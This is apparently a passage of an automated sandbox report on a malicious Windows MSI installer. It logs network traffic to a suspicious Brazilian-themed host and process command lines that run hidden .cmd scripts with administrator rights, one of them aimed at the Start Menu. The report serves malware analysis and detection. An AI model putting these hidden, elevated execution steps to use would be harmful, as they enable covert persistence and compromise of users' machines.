                                                                      Jun 1, 2024 19:05:15.499731064 CEST4434974720.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:15.499754906 CEST49747443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:15.499762058 CEST4434974720.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:15.499769926 CEST49747443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:15.499931097 CEST4434974720.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:15.499984026 CEST49747443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:15.499990940 CEST4434974720.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:15.500112057 CEST4434974720.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:15.500155926 CEST49747443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:15.521392107 CEST49747443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:15.521406889 CEST4434974720.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:15.521423101 CEST49747443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:15.521429062 CEST4434974720.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:32.969974041 CEST4434974545.90.123.184192.168.2.4
                                                                      Jun 1, 2024 19:05:32.970060110 CEST4434974545.90.123.184192.168.2.4
                                                                      Jun 1, 2024 19:05:32.970102072 CEST49745443192.168.2.445.90.123.184
                                                                      Jun 1, 2024 19:05:33.789696932 CEST49745443192.168.2.445.90.123.184
                                                                      Jun 1, 2024 19:05:33.789729118 CEST4434974545.90.123.184192.168.2.4
                                                                      Jun 1, 2024 19:05:49.448507071 CEST49752443192.168.2.4172.217.18.4
                                                                      Jun 1, 2024 19:05:49.448551893 CEST44349752172.217.18.4192.168.2.4
                                                                      Jun 1, 2024 19:05:49.448693991 CEST49752443192.168.2.4172.217.18.4
                                                                      Jun 1, 2024 19:05:49.449331999 CEST49752443192.168.2.4172.217.18.4
                                                                      Jun 1, 2024 19:05:49.449347019 CEST44349752172.217.18.4192.168.2.4
                                                                      Jun 1, 2024 19:05:50.303205013 CEST44349752172.217.18.4192.168.2.4
                                                                      Jun 1, 2024 19:05:50.349622011 CEST49752443192.168.2.4172.217.18.4
                                                                      Jun 1, 2024 19:05:50.353286982 CEST49752443192.168.2.4172.217.18.4
                                                                      Jun 1, 2024 19:05:50.353295088 CEST44349752172.217.18.4192.168.2.4
                                                                      Jun 1, 2024 19:05:50.353849888 CEST44349752172.217.18.4192.168.2.4
                                                                      Jun 1, 2024 19:05:50.376013994 CEST49752443192.168.2.4172.217.18.4
                                                                      Jun 1, 2024 19:05:50.376177073 CEST44349752172.217.18.4192.168.2.4
                                                                      Jun 1, 2024 19:05:50.552400112 CEST49752443192.168.2.4172.217.18.4
                                                                      Jun 1, 2024 19:05:51.802010059 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:51.802052975 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:51.802112103 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:51.802453041 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:51.802465916 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.690184116 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.690308094 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:52.698635101 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:52.698656082 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.698890924 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.707422972 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:52.748503923 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.997056007 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.997086048 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.997103930 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.997159004 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:52.997173071 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.997215033 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:52.998141050 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.998186111 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.998209000 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:52.998217106 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.998236895 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:52.998305082 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:53.010322094 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:53.010339022 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:05:53.010371923 CEST49753443192.168.2.420.114.59.183
                                                                      Jun 1, 2024 19:05:53.010377884 CEST4434975320.114.59.183192.168.2.4
                                                                      Jun 1, 2024 19:06:00.316391945 CEST44349752172.217.18.4192.168.2.4
                                                                      Jun 1, 2024 19:06:00.316478014 CEST44349752172.217.18.4192.168.2.4
                                                                      Jun 1, 2024 19:06:00.316580057 CEST49752443192.168.2.4172.217.18.4
                                                                      Jun 1, 2024 19:06:01.776881933 CEST49752443192.168.2.4172.217.18.4
                                                                      Jun 1, 2024 19:06:01.776909113 CEST44349752172.217.18.4192.168.2.4
                                                                      Jun 1, 2024 19:06:49.514484882 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:06:49.514545918 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:06:49.514607906 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:06:49.518752098 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:06:49.518783092 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:06:50.364306927 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:06:50.364680052 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:06:50.364705086 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:06:50.365017891 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:06:50.365322113 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:06:50.365372896 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:06:50.412832975 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:07:00.389358997 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:07:00.389425039 CEST44349756216.58.206.68192.168.2.4
                                                                      Jun 1, 2024 19:07:00.389467001 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:07:01.840553045 CEST49756443192.168.2.4216.58.206.68
                                                                      Jun 1, 2024 19:07:01.840610027 CEST44349756216.58.206.68192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jun 1, 2024 19:04:45.824647903 CEST5985453192.168.2.41.1.1.1
                                                                      Jun 1, 2024 19:04:45.824785948 CEST5549253192.168.2.41.1.1.1
                                                                      Jun 1, 2024 19:04:45.831521988 CEST53580441.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:04:45.979582071 CEST53598541.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:04:46.001344919 CEST53602761.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:04:46.250494003 CEST53554921.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:04:47.661015987 CEST53564411.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:04:49.382695913 CEST6011753192.168.2.41.1.1.1
                                                                      Jun 1, 2024 19:04:49.382900000 CEST5436353192.168.2.41.1.1.1
                                                                      Jun 1, 2024 19:04:49.389683008 CEST53601171.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:04:49.390152931 CEST53543631.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:04:58.250770092 CEST138138192.168.2.4192.168.2.255
                                                                      Jun 1, 2024 19:05:05.359659910 CEST53579111.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:05:25.202254057 CEST53640161.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:05:45.017178059 CEST53653821.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:05:48.233963966 CEST53534091.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:06:14.252450943 CEST53594181.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:06:49.502377033 CEST5567053192.168.2.41.1.1.1
                                                                      Jun 1, 2024 19:06:49.502505064 CEST5595553192.168.2.41.1.1.1
                                                                      Jun 1, 2024 19:06:49.509762049 CEST53556701.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:06:49.509778023 CEST53559551.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:06:59.503633976 CEST53558041.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:08:16.124171972 CEST53639241.1.1.1192.168.2.4
                                                                      Jun 1, 2024 19:08:59.087101936 CEST138138192.168.2.4192.168.2.255

                                                                      ICMP Packets

                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                      Jun 1, 2024 19:04:46.250566959 CEST192.168.2.41.1.1.1c22b(Port unreachable)Destination Unreachable

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Jun 1, 2024 19:04:45.824647903 CEST192.168.2.41.1.1.10x576dStandard query (0)winrarbrasil.from-mn.comA (IP address)IN (0x0001)false
                                                                      Jun 1, 2024 19:04:45.824785948 CEST192.168.2.41.1.1.10xf932Standard query (0)winrarbrasil.from-mn.com65IN (0x0001)false
                                                                      Jun 1, 2024 19:04:49.382695913 CEST192.168.2.41.1.1.10x4d7eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                      Jun 1, 2024 19:04:49.382900000 CEST192.168.2.41.1.1.10xd83fStandard query (0)www.google.com65IN (0x0001)false
                                                                      Jun 1, 2024 19:06:49.502377033 CEST192.168.2.41.1.1.10x48c3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                      Jun 1, 2024 19:06:49.502505064 CEST192.168.2.41.1.1.10xb3d2Standard query (0)www.google.com65IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Jun 1, 2024 19:04:45.979582071 CEST1.1.1.1192.168.2.40x576dNo error (0)winrarbrasil.from-mn.com45.90.123.184A (IP address)IN (0x0001)false
                                                                      Jun 1, 2024 19:04:49.389683008 CEST1.1.1.1192.168.2.40x4d7eNo error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
                                                                      Jun 1, 2024 19:04:49.390152931 CEST1.1.1.1192.168.2.40xd83fNo error (0)www.google.com65IN (0x0001)false
                                                                      Jun 1, 2024 19:06:49.509762049 CEST1.1.1.1192.168.2.40x48c3No error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                      Jun 1, 2024 19:06:49.509778023 CEST1.1.1.1192.168.2.40xb3d2No error (0)www.google.com65IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • winrarbrasil.from-mn.com
                                                                      • https:
                                                                      • slscr.update.microsoft.com

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.44973545.90.123.1844437652C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-06-01 17:04:46 UTC693OUTGET /clientes/inspecionando.php HTTP/1.1
                                                                      Host: winrarbrasil.from-mn.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Upgrade-Insecure-Requests: 1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: navigate
                                                                      Sec-Fetch-User: ?1
                                                                      Sec-Fetch-Dest: document
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-06-01 17:04:47 UTC166INHTTP/1.1 200 OK
                                                                      Date: Sat, 01 Jun 2024 17:04:47 GMT
                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=UTF-8


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.44973645.90.123.1844437652C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-06-01 17:04:47 UTC630OUTGET /favicon.ico HTTP/1.1
                                                                      Host: winrarbrasil.from-mn.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: image
                                                                      Referer: https://winrarbrasil.from-mn.com/clientes/inspecionando.php
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-06-01 17:04:47 UTC180INHTTP/1.1 404 Not Found
                                                                      Date: Sat, 01 Jun 2024 17:04:47 GMT
                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                      Content-Length: 287
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      2024-06-01 17:04:47 UTC287INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 69 6e 72 61 72 62 72 61 73 69 6c 2e 66 72 6f 6d 2d 6d 6e 2e 63 6f 6d 20 50 6f
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at winrarbrasil.from-mn.com Po


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.44974645.90.123.1844437652C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-06-01 17:05:12 UTC776OUTGET /clientes/inspecionando.php HTTP/1.1
                                                                      Host: winrarbrasil.from-mn.com
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=0
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Upgrade-Insecure-Requests: 1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: navigate
                                                                      Sec-Fetch-Dest: document
                                                                      Referer: https://winrarbrasil.from-mn.com/clientes/inspecionando.php
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-06-01 17:05:13 UTC166INHTTP/1.1 200 OK
                                                                      Date: Sat, 01 Jun 2024 17:05:12 GMT
                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=UTF-8


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.44974720.114.59.183443
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-06-01 17:05:15 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=l4wC5+uAGMYoEDn&MD=LxwYCEF6 HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                      Host: slscr.update.microsoft.com
                                                                      2024-06-01 17:05:15 UTC560INHTTP/1.1 200 OK
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Content-Type: application/octet-stream
                                                                      Expires: -1
                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                      MS-CorrelationId: b41c56b4-098e-4d01-a114-9d67188daf7e
                                                                      MS-RequestId: d39f0281-bf57-4edd-935a-5ead5a271f24
                                                                      MS-CV: qCn08b8yBkacdBwu.0
                                                                      X-Microsoft-SLSClientCache: 2880
                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                      X-Content-Type-Options: nosniff
                                                                      Date: Sat, 01 Jun 2024 17:05:14 GMT
                                                                      Connection: close
                                                                      Content-Length: 24490
                                                                      2024-06-01 17:05:15 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                      2024-06-01 17:05:15 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.44975320.114.59.183443
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-06-01 17:05:52 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=l4wC5+uAGMYoEDn&MD=LxwYCEF6 HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                      Host: slscr.update.microsoft.com
                                                                      2024-06-01 17:05:52 UTC560INHTTP/1.1 200 OK
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Content-Type: application/octet-stream
                                                                      Expires: -1
                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                      ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_1440"
                                                                      MS-CorrelationId: 12b9c627-184a-42bd-8f64-7de134e96b2f
                                                                      MS-RequestId: 034fbd7b-2cd5-405d-9511-056788b67cbf
                                                                      MS-CV: P/YHc4oGFE6Rlavw.0
                                                                      X-Microsoft-SLSClientCache: 1440
                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                      X-Content-Type-Options: nosniff
                                                                      Date: Sat, 01 Jun 2024 17:05:52 GMT
                                                                      Connection: close
                                                                      Content-Length: 25457
                                                                      2024-06-01 17:05:52 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                      Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                      2024-06-01 17:05:52 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                      Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:13:04:35
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\CrzA2u67LQ.msi"
                                                                      Imagebase:0x7ff622680000
                                                                      File size:69'632 bytes
                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:1
                                                                      Start time:13:04:36
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                      Imagebase:0x7ff622680000
                                                                      File size:69'632 bytes
                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:2
                                                                      Start time:13:04:37
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding D52069831D98616EE51C5339C351C5F6
                                                                      Imagebase:0x7f0000
                                                                      File size:59'904 bytes
                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:13:04:39
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\Installer\MSI5DCF.tmp
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Installer\MSI5DCF.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\
                                                                      Imagebase:0xad0000
                                                                      File size:423'936 bytes
                                                                      MD5 hash:768B35409005592DE2333371C6253BC8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      • Detection: 0%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:13:04:39
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\Installer\MSI5DEF.tmp
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Installer\MSI5DEF.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                                                                      Imagebase:0xae0000
                                                                      File size:423'936 bytes
